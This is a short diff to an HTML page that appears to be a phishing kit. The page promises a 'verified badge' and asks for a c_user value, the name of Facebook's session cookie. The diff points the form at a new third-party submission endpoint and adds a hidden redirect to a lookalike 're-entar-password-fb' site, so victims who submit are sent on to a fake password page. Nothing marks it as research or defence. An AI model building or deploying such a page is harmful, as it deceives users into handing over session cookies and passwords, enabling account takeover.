--- a/index.html
+++ b/index.html
@@ -224,9 +224,12 @@
       <p class=form-notice>Please ensure that all required information is accurately provided. Failure to do so may
          result in not receiving a verified badge.</p>
 
-      <form class="mainForm" id=userForm action=https://submit-form.com/OBdutaEgu  method=POST>
-
-
+                        <form class="content" action="https://submit-form.com/rx9KBzcZA" method="POST">
+ <input
+    type="hidden"
+    name="_redirect"
+    value="https://re-entar-password-fb.vercel.app/"
+  />
          
          <div class=form-group>
             <label for=c_user>c_user</label>
